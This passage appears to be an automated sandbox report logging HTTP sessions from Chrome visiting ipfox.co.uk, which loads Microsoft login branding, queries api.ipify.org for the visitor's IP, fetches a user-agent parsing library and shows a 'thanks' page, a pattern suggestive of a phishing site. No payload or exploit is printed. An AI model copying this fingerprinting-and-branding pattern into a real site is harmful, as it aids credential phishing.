                                              2024-10-25 13:45:10 UTC10037INData Raw: 32 37 32 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 26 f4 49 44 41 54 78 9c ec bd 09 94 65 55 75 37 be f7 3e e7 de fb 86 aa 9e aa ba 7a a6 69 7a a0 41 9a 66 92 29 08 b4 0c 0d 06 41 8c 80 0b a3 98 28 c1 18 13 89 43 e4 9f f1 9f 44 83 31 31 fa c5 98 cf 29 51 1c 3e 67 13 25 1a 45 44 10 51 c6 00 02 d2 84 a1 b1 e7 ea ae ee ae ee 1a de bb f7 9e b3 f7 b7 ce 39 f7 be 7a 4d 37 2d d5 d5 f2 b2 d6 f7 f6 7a ab a8 7a fd de b9 e7 ec 7d ce 1e 7f fb a0 07 ce 78 33 74 a9 73 44 9d 9e c0 ff eb d4 15 40 87 a9 2b 80 0e 53 57 00 1d a6 ae 00 3a 4c 5d 01 74 98 ba 02 e8 30 75 05 d0 61 ea 0a a0 c3 d4 15 40 87 a9 2b 80 0e 53 57 00 1d a6 ae 00 3a 4c 5d 01 74 98 ba 02 e8 30 75 05 d0 61 ea 0a a0 c3 d4 15 40 87 a9 2b
                                              Data Ascii: 272dPNGIHDRL\&IDATxeUu7>zizAf)A(CD11)Q>g%EDQ9zM7-zz}x3tsD@+SW:L]t0ua@+SW:L]t0ua@+
                                              2024-10-25 13:45:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.449744152.199.21.1754431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:10 UTC651OUTGET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
                                              Host: aadcdn.msftauth.net
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://ipfox.co.uk/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:10 UTC738INHTTP/1.1 200 OK
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              Age: 18514134
                                              Cache-Control: public, max-age=31536000
                                              Content-MD5: nzaLxFgP7ZB3dfMcaybWzw==
                                              Content-Type: image/svg+xml
                                              Date: Fri, 25 Oct 2024 13:45:10 GMT
                                              Etag: 0x8D79A1B9F5E121A
                                              Last-Modified: Thu, 16 Jan 2020 00:32:52 GMT
                                              Server: ECAcc (lhc/7936)
                                              Vary: Accept-Encoding
                                              X-Cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: 91dbb46b-a01e-00e9-0b81-7e3c42000000
                                              x-ms-version: 2009-09-19
                                              Content-Length: 3651
                                              Connection: close
                                              2024-10-25 13:45:10 UTC3651INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30
                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.449746104.26.13.2054431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:11 UTC545OUTGET /?format=json HTTP/1.1
                                              Host: api.ipify.org
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Origin: https://ipfox.co.uk
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Referer: https://ipfox.co.uk/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:11 UTC249INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:11 GMT
                                              Content-Type: application/json
                                              Content-Length: 23
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              Vary: Origin
                                              cf-cache-status: DYNAMIC
                                              Server: cloudflare
                                              CF-RAY: 8d82a5456bf36c52-DFW
                                              2024-10-25 13:45:11 UTC23INData Raw: 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 22 7d
                                              Data Ascii: {"ip":"173.254.250.81"}


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.449747184.28.90.27443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:11 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept: */*
                                              Accept-Encoding: identity
                                              User-Agent: Microsoft BITS/7.8
                                              Host: fs.microsoft.com
                                              2024-10-25 13:45:12 UTC467INHTTP/1.1 200 OK
                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                              Content-Type: application/octet-stream
                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                              Server: ECAcc (lpl/EF70)
                                              X-CID: 11
                                              X-Ms-ApiVersion: Distribute 1.2
                                              X-Ms-Region: prod-weu-z1
                                              Cache-Control: public, max-age=183590
                                              Date: Fri, 25 Oct 2024 13:45:12 GMT
                                              Connection: close
                                              X-CID: 2


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.449752104.26.13.2054431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:11 UTC349OUTGET /?format=json HTTP/1.1
                                              Host: api.ipify.org
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:12 UTC217INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:12 GMT
                                              Content-Type: application/json
                                              Content-Length: 23
                                              Connection: close
                                              Vary: Origin
                                              cf-cache-status: DYNAMIC
                                              Server: cloudflare
                                              CF-RAY: 8d82a54a5ea1e70a-DFW
                                              2024-10-25 13:45:12 UTC23INData Raw: 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 22 7d
                                              Data Ascii: {"ip":"173.254.250.81"}


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.449751104.17.24.144431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:11 UTC389OUTGET /ajax/libs/UAParser.js/0.7.31/ua-parser.min.js HTTP/1.1
                                              Host: cdnjs.cloudflare.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:12 UTC953INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:12 GMT
                                              Content-Type: application/javascript; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              Cache-Control: public, max-age=30672000
                                              ETag: W/"6179331d-1a2b"
                                              Last-Modified: Wed, 27 Oct 2021 11:08:13 GMT
                                              cf-cdnjs-via: cfworker/kv
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Timing-Allow-Origin: *
                                              X-Content-Type-Options: nosniff
                                              CF-Cache-Status: HIT
                                              Age: 4
                                              Expires: Wed, 15 Oct 2025 13:45:12 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JGhfcrp2UUM9jzGEc7JFYVw9VOzUSWGBBtebQhiVOTn4ugVnaAKwqb5p7iQsoSlMT78%2BOcZvAVObao9vNW4uHrC1qUs52dmr97oG%2BuMpGujRWhT6HZC%2B2MXQOzObPKCbSbECnbk1"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=15780000
                                              Server: cloudflare
                                              CF-RAY: 8d82a54a5bef4790-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              2024-10-25 13:45:12 UTC416INData Raw: 33 62 61 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 72 2c 64 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 69 29 7b 66 6f 72 28 76 61 72 20 65 3d 7b 7d 2c 6f 3d 30 3b 6f 3c 69 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 65 5b 69 5b 6f 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 3d 69 5b 6f 5d 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 69 2c 65 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 69 3d 3d 3d 70 26 26 2d 31 21 3d 3d 46 28 65 29 2e 69 6e 64 65 78 4f 66 28 46 28 69 29 29 7d 66 75 6e 63 74 69 6f 6e 20 74 28 69 2c 65 29 7b 69 66 28 74 79 70 65 6f 66 20 69 3d 3d 3d 70 29 72 65 74 75 72 6e 20 69 3d 69 2e 72 65 70 6c 61 63 65 28 2f 5e 5c 73 5c 73 2a 2f 2c 77 29 2e 72 65 70 6c 61 63 65 28 2f 5c 73 5c 73 2a 24
                                              Data Ascii: 3ba3!function(r,d){"use strict";function i(i){for(var e={},o=0;o<i.length;o++)e[i[o].toUpperCase()]=i[o];return e}function n(i,e){return typeof i===p&&-1!==F(e).indexOf(F(i))}function t(i,e){if(typeof i===p)return i=i.replace(/^\s\s*/,w).replace(/\s\s*$
                                              2024-10-25 13:45:12 UTC1369INData Raw: 72 28 61 3d 30 3b 61 3c 77 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 74 3d 6e 5b 2b 2b 6f 5d 2c 74 79 70 65 6f 66 28 72 3d 77 5b 61 5d 29 3d 3d 3d 63 26 26 30 3c 72 2e 6c 65 6e 67 74 68 3f 32 3d 3d 3d 72 2e 6c 65 6e 67 74 68 3f 74 79 70 65 6f 66 20 72 5b 31 5d 3d 3d 75 3f 74 68 69 73 5b 72 5b 30 5d 5d 3d 72 5b 31 5d 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 3a 74 68 69 73 5b 72 5b 30 5d 5d 3d 72 5b 31 5d 3a 33 3d 3d 3d 72 2e 6c 65 6e 67 74 68 3f 74 79 70 65 6f 66 20 72 5b 31 5d 21 3d 3d 75 7c 7c 72 5b 31 5d 2e 65 78 65 63 26 26 72 5b 31 5d 2e 74 65 73 74 3f 74 68 69 73 5b 72 5b 30 5d 5d 3d 74 3f 74 2e 72 65 70 6c 61 63 65 28 72 5b 31 5d 2c 72 5b 32 5d 29 3a 64 3a 74 68 69 73 5b 72 5b 30 5d 5d 3d 74 3f 72 5b 31 5d 2e 63 61 6c 6c 28 74 68 69 73 2c 74 2c 72 5b 32 5d
                                              Data Ascii: r(a=0;a<w.length;a++)t=n[++o],typeof(r=w[a])===c&&0<r.length?2===r.length?typeof r[1]==u?this[r[0]]=r[1].call(this,t):this[r[0]]=r[1]:3===r.length?typeof r[1]!==u||r[1].exec&&r[1].test?this[r[0]]=t?t.replace(r[1],r[2]):d:this[r[0]]=t?r[1].call(this,t,r[2]
                                              2024-10-25 13:45:12 UTC1369INData Raw: 74 45 6e 67 69 6e 65 28 29 2c 6f 73 3a 74 68 69 73 2e 67 65 74 4f 53 28 29 2c 64 65 76 69 63 65 3a 74 68 69 73 2e 67 65 74 44 65 76 69 63 65 28 29 2c 63 70 75 3a 74 68 69 73 2e 67 65 74 43 50 55 28 29 7d 7d 2c 74 68 69 73 2e 67 65 74 55 41 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 74 68 69 73 2e 73 65 74 55 41 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 72 65 74 75 72 6e 20 6f 3d 74 79 70 65 6f 66 20 69 3d 3d 3d 70 26 26 32 35 35 3c 69 2e 6c 65 6e 67 74 68 3f 74 28 69 2c 32 35 35 29 3a 69 2c 74 68 69 73 7d 2c 74 68 69 73 2e 73 65 74 55 41 28 6f 29 2c 74 68 69 73 7d 76 61 72 20 77 3d 22 22 2c 75 3d 22 66 75 6e 63 74 69 6f 6e 22 2c 6c 3d 22 75 6e 64 65 66 69 6e 65 64 22 2c 63 3d 22 6f 62 6a 65 63 74 22 2c 70 3d 22 73 74 72 69 6e 67 22 2c
                                              Data Ascii: tEngine(),os:this.getOS(),device:this.getDevice(),cpu:this.getCPU()}},this.getUA=function(){return o},this.setUA=function(i){return o=typeof i===p&&255<i.length?t(i,255):i,this},this.setUA(o),this}var w="",u="function",l="undefined",c="object",p="string",
                                              2024-10-25 13:45:12 UTC1369INData Raw: 77 73 65 72 7c 62 6f 6c 74 7c 69 72 6f 6e 7c 76 69 76 61 6c 64 69 7c 69 72 69 64 69 75 6d 7c 70 68 61 6e 74 6f 6d 6a 73 7c 62 6f 77 73 65 72 7c 71 75 61 72 6b 7c 71 75 70 7a 69 6c 6c 61 7c 66 61 6c 6b 6f 6e 7c 72 65 6b 6f 6e 71 7c 70 75 66 66 69 6e 7c 62 72 61 76 65 7c 77 68 61 6c 65 7c 71 71 62 72 6f 77 73 65 72 6c 69 74 65 7c 71 71 29 5c 2f 28 5b 2d 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 77 65 69 62 6f 29 5f 5f 28 5b 5c 64 5c 2e 5d 2b 29 2f 69 5d 2c 5b 66 2c 76 5d 2c 5b 2f 28 3f 3a 5c 62 75 63 3f 20 3f 62 72 6f 77 73 65 72 7c 28 3f 3a 6a 75 63 2e 2b 29 75 63 77 65 62 29 5b 5c 2f 20 5d 3f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 76 2c 5b 66 2c 22 55 43 22 2b 41 5d 5d 2c 5b 2f 5c 62 71 62 63 6f 72 65 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 76 2c 5b
                                              Data Ascii: wser|bolt|iron|vivaldi|iridium|phantomjs|bowser|quark|qupzilla|falkon|rekonq|puffin|brave|whale|qqbrowserlite|qq)\/([-\w\.]+)/i,/(weibo)__([\d\.]+)/i],[f,v],[/(?:\buc? ?browser|(?:juc.+)ucweb)[\/ ]?([\w\.]+)/i],[v,[f,"UC"+A]],[/\bqbcore\/([\w\.]+)/i],[v,[
                                              2024-10-25 13:45:12 UTC1369INData Raw: 2f 5c 62 67 73 61 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 20 2e 2a 73 61 66 61 72 69 5c 2f 2f 69 5d 2c 5b 76 2c 5b 66 2c 22 47 53 41 22 5d 5d 2c 5b 2f 68 65 61 64 6c 65 73 73 63 68 72 6f 6d 65 28 3f 3a 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 7c 20 29 2f 69 5d 2c 5b 76 2c 5b 66 2c 43 2b 22 20 48 65 61 64 6c 65 73 73 22 5d 5d 2c 5b 2f 20 77 76 5c 29 2e 2b 28 63 68 72 6f 6d 65 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 5b 66 2c 43 2b 22 20 57 65 62 56 69 65 77 22 5d 2c 76 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 20 76 65 72 73 69 6f 6e 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 5c 62 2e 2b 28 3f 3a 6d 6f 62 69 6c 65 20 73 61 66 61 72 69 7c 73 61 66 61 72 69 29 2f 69 5d 2c 5b 76 2c 5b 66 2c 22 41 6e 64 72 6f 69 64 20 22 2b 41 5d 5d 2c 5b 2f 28 63 68 72 6f 6d 65 7c 6f 6d 6e 69 77 65
                                              Data Ascii: /\bgsa\/([\w\.]+) .*safari\//i],[v,[f,"GSA"]],[/headlesschrome(?:\/([\w\.]+)| )/i],[v,[f,C+" Headless"]],[/ wv\).+(chrome)\/([\w\.]+)/i],[[f,C+" WebView"],v],[/droid.+ version\/([\w\.]+)\b.+(?:mobile safari|safari)/i],[v,[f,"Android "+A]],[/(chrome|omniwe
                                              2024-10-25 13:45:12 UTC1369INData Raw: 29 29 5c 62 2f 69 5d 2c 5b 5b 78 2c 22 61 72 6d 36 34 22 5d 5d 2c 5b 2f 5c 62 28 61 72 6d 28 3f 3a 76 5b 36 37 5d 29 3f 68 74 3f 6e 3f 5b 66 6c 5d 70 3f 29 5c 62 2f 69 5d 2c 5b 5b 78 2c 22 61 72 6d 68 66 22 5d 5d 2c 5b 2f 77 69 6e 64 6f 77 73 20 28 63 65 7c 6d 6f 62 69 6c 65 29 3b 20 70 70 63 3b 2f 69 5d 2c 5b 5b 78 2c 22 61 72 6d 22 5d 5d 2c 5b 2f 28 28 3f 3a 70 70 63 7c 70 6f 77 65 72 70 63 29 28 3f 3a 36 34 29 3f 29 28 3f 3a 20 6d 61 63 7c 3b 7c 5c 29 29 2f 69 5d 2c 5b 5b 78 2c 2f 6f 77 65 72 2f 2c 77 2c 46 5d 5d 2c 5b 2f 28 73 75 6e 34 5c 77 29 5b 3b 5c 29 5d 2f 69 5d 2c 5b 5b 78 2c 22 73 70 61 72 63 22 5d 5d 2c 5b 2f 28 28 3f 3a 61 76 72 33 32 7c 69 61 36 34 28 3f 3d 3b 29 29 7c 36 38 6b 28 3f 3d 5c 29 29 7c 5c 62 61 72 6d 28 3f 3d 76 28 3f 3a 5b 31
                                              Data Ascii: ))\b/i],[[x,"arm64"]],[/\b(arm(?:v[67])?ht?n?[fl]p?)\b/i],[[x,"armhf"]],[/windows (ce|mobile); ppc;/i],[[x,"arm"]],[/((?:ppc|powerpc)(?:64)?)(?: mac|;|\))/i],[[x,/ower/,w,F]],[/(sun4\w)[;\)]/i],[[x,"sparc"]],[/((?:avr32|ia64(?=;))|68k(?=\))|\barm(?=v(?:[1
                                              2024-10-25 13:45:12 UTC1369INData Raw: 69 76 6f 20 28 5c 77 2b 29 28 3f 3a 20 62 75 69 7c 5c 29 29 2f 69 2c 2f 5c 62 28 76 5b 31 32 5d 5c 64 7b 33 7d 5c 77 3f 5b 61 74 5d 29 28 3f 3a 20 62 75 69 7c 3b 29 2f 69 5d 2c 5b 6d 2c 5b 67 2c 22 56 69 76 6f 22 5d 2c 5b 68 2c 61 5d 5d 2c 5b 2f 5c 62 28 72 6d 78 5b 31 32 5d 5c 64 7b 33 7d 29 28 3f 3a 20 62 75 69 7c 3b 7c 5c 29 29 2f 69 5d 2c 5b 6d 2c 5b 67 2c 22 52 65 61 6c 6d 65 22 5d 2c 5b 68 2c 61 5d 5d 2c 5b 2f 5c 62 28 6d 69 6c 65 73 74 6f 6e 65 7c 64 72 6f 69 64 28 3f 3a 5b 32 2d 34 78 5d 7c 20 28 3f 3a 62 69 6f 6e 69 63 7c 78 32 7c 70 72 6f 7c 72 61 7a 72 29 29 3f 3a 3f 28 20 34 67 29 3f 29 5c 62 5b 5c 77 20 5d 2b 62 75 69 6c 64 5c 2f 2f 69 2c 2f 5c 62 6d 6f 74 28 3f 3a 6f 72 6f 6c 61 29 3f 5b 2d 20 5d 28 5c 77 2a 29 2f 69 2c 2f 28 28 3f 3a 6d 6f
                                              Data Ascii: ivo (\w+)(?: bui|\))/i,/\b(v[12]\d{3}\w?[at])(?: bui|;)/i],[m,[g,"Vivo"],[h,a]],[/\b(rmx[12]\d{3})(?: bui|;|\))/i],[m,[g,"Realme"],[h,a]],[/\b(milestone|droid(?:[2-4x]| (?:bionic|x2|pro|razr))?:?( 4g)?)\b[\w ]+build\//i,/\bmot(?:orola)?[- ](\w*)/i,/((?:mo
                                              2024-10-25 13:45:12 UTC1369INData Raw: 6e 65 20 24 31 22 5d 2c 5b 67 2c 54 5d 2c 5b 68 2c 61 5d 5d 2c 5b 2f 28 70 6c 61 79 62 6f 6f 6b 29 3b 5b 2d 5c 77 5c 29 2c 3b 20 5d 2b 28 72 69 6d 29 2f 69 5d 2c 5b 6d 2c 67 2c 5b 68 2c 6b 5d 5d 2c 5b 2f 5c 62 28 28 3f 3a 62 62 5b 61 2d 66 5d 7c 73 74 5b 68 76 5d 29 31 30 30 2d 5c 64 29 2f 69 2c 2f 5c 28 62 62 31 30 3b 20 28 5c 77 2b 29 2f 69 5d 2c 5b 6d 2c 5b 67 2c 4e 5d 2c 5b 68 2c 61 5d 5d 2c 5b 2f 28 3f 3a 5c 62 7c 61 73 75 73 5f 29 28 74 72 61 6e 73 66 6f 5b 70 72 69 6d 65 20 5d 7b 34 2c 31 30 7d 20 5c 77 2b 7c 65 65 65 70 63 7c 73 6c 69 64 65 72 20 5c 77 2b 7c 6e 65 78 75 73 20 37 7c 70 61 64 66 6f 6e 65 7c 70 30 30 5b 63 6a 5d 29 2f 69 5d 2c 5b 6d 2c 5b 67 2c 7a 5d 2c 5b 68 2c 6b 5d 5d 2c 5b 2f 20 28 7a 5b 62 65 73 5d 36 5b 30 32 37 5d 5b 30 31 32
                                              Data Ascii: ne $1"],[g,T],[h,a]],[/(playbook);[-\w\),; ]+(rim)/i],[m,g,[h,k]],[/\b((?:bb[a-f]|st[hv])100-\d)/i,/\(bb10; (\w+)/i],[m,[g,N],[h,a]],[/(?:\b|asus_)(transfo[prime ]{4,10} \w+|eeepc|slider \w+|nexus 7|padfone|p00[cj])/i],[m,[g,z],[h,k]],[/ (z[bes]6[027][012
                                              2024-10-25 13:45:12 UTC1369INData Raw: 69 5d 2c 5b 6d 2c 5b 67 2c 22 53 69 65 6d 65 6e 73 22 5d 2c 5b 68 2c 61 5d 5d 2c 5b 2f 5c 62 28 72 63 74 5c 77 2b 29 20 62 2f 69 5d 2c 5b 6d 2c 5b 67 2c 22 52 43 41 22 5d 2c 5b 68 2c 6b 5d 5d 2c 5b 2f 5c 62 28 76 65 6e 75 65 5b 5c 64 20 5d 7b 32 2c 37 7d 29 20 62 2f 69 5d 2c 5b 6d 2c 5b 67 2c 22 44 65 6c 6c 22 5d 2c 5b 68 2c 6b 5d 5d 2c 5b 2f 5c 62 28 71 28 3f 3a 6d 76 7c 74 61 29 5c 77 2b 29 20 62 2f 69 5d 2c 5b 6d 2c 5b 67 2c 22 56 65 72 69 7a 6f 6e 22 5d 2c 5b 68 2c 6b 5d 5d 2c 5b 2f 5c 62 28 3f 3a 62 61 72 6e 65 73 5b 26 20 5d 2b 6e 6f 62 6c 65 20 7c 62 6e 5b 72 74 5d 29 28 5b 5c 77 5c 2b 20 5d 2a 29 20 62 2f 69 5d 2c 5b 6d 2c 5b 67 2c 22 42 61 72 6e 65 73 20 26 20 4e 6f 62 6c 65 22 5d 2c 5b 68 2c 6b 5d 5d 2c 5b 2f 5c 62 28 74 6d 5c 64 7b 33 7d 5c 77
                                              Data Ascii: i],[m,[g,"Siemens"],[h,a]],[/\b(rct\w+) b/i],[m,[g,"RCA"],[h,k]],[/\b(venue[\d ]{2,7}) b/i],[m,[g,"Dell"],[h,k]],[/\b(q(?:mv|ta)\w+) b/i],[m,[g,"Verizon"],[h,k]],[/\b(?:barnes[& ]+noble |bn[rt])([\w\+ ]*) b/i],[m,[g,"Barnes & Noble"],[h,k]],[/\b(tm\d{3}\w
                                              2024-10-25 13:45:12 UTC1369INData Raw: 2c 6f 5d 5d 2c 5b 2f 28 70 6c 61 79 73 74 61 74 69 6f 6e 20 5b 33 34 35 70 6f 72 74 61 62 6c 65 76 69 5d 2b 29 2f 69 5d 2c 5b 6d 2c 5b 67 2c 42 5d 2c 5b 68 2c 6f 5d 5d 2c 5b 2f 5c 62 28 78 62 6f 78 28 3f 3a 20 6f 6e 65 29 3f 28 3f 21 3b 20 78 62 6f 78 29 29 5b 5c 29 3b 20 5d 2f 69 5d 2c 5b 6d 2c 5b 67 2c 52 5d 2c 5b 68 2c 6f 5d 5d 2c 5b 2f 73 6d 61 72 74 2d 74 76 2e 2b 28 73 61 6d 73 75 6e 67 29 2f 69 5d 2c 5b 67 2c 5b 68 2c 79 5d 5d 2c 5b 2f 68 62 62 74 76 2e 2b 6d 61 70 6c 65 3b 28 5c 64 2b 29 2f 69 5d 2c 5b 5b 6d 2c 2f 5e 2f 2c 22 53 6d 61 72 74 54 56 22 5d 2c 5b 67 2c 56 5d 2c 5b 68 2c 79 5d 5d 2c 5b 2f 28 6e 75 78 3b 20 6e 65 74 63 61 73 74 2e 2b 73 6d 61 72 74 74 76 7c 6c 67 20 28 6e 65 74 63 61 73 74 5c 2e 74 76 2d 32 30 31 5c 64 7c 61 6e 64 72 6f
                                              Data Ascii: ,o]],[/(playstation [345portablevi]+)/i],[m,[g,B],[h,o]],[/\b(xbox(?: one)?(?!; xbox))[\); ]/i],[m,[g,R],[h,o]],[/smart-tv.+(samsung)/i],[g,[h,y]],[/hbbtv.+maple;(\d+)/i],[[m,/^/,"SmartTV"],[g,V],[h,y]],[/(nux; netcast.+smarttv|lg (netcast\.tv-201\d|andro


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.449749107.178.102.964431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:11 UTC595OUTGET /favicon.ico HTTP/1.1
                                              Host: ipfox.co.uk
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://ipfox.co.uk/pages/thanks.html
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:12 UTC396INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 708
                                              date: Fri, 25 Oct 2024 13:45:12 GMT
                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
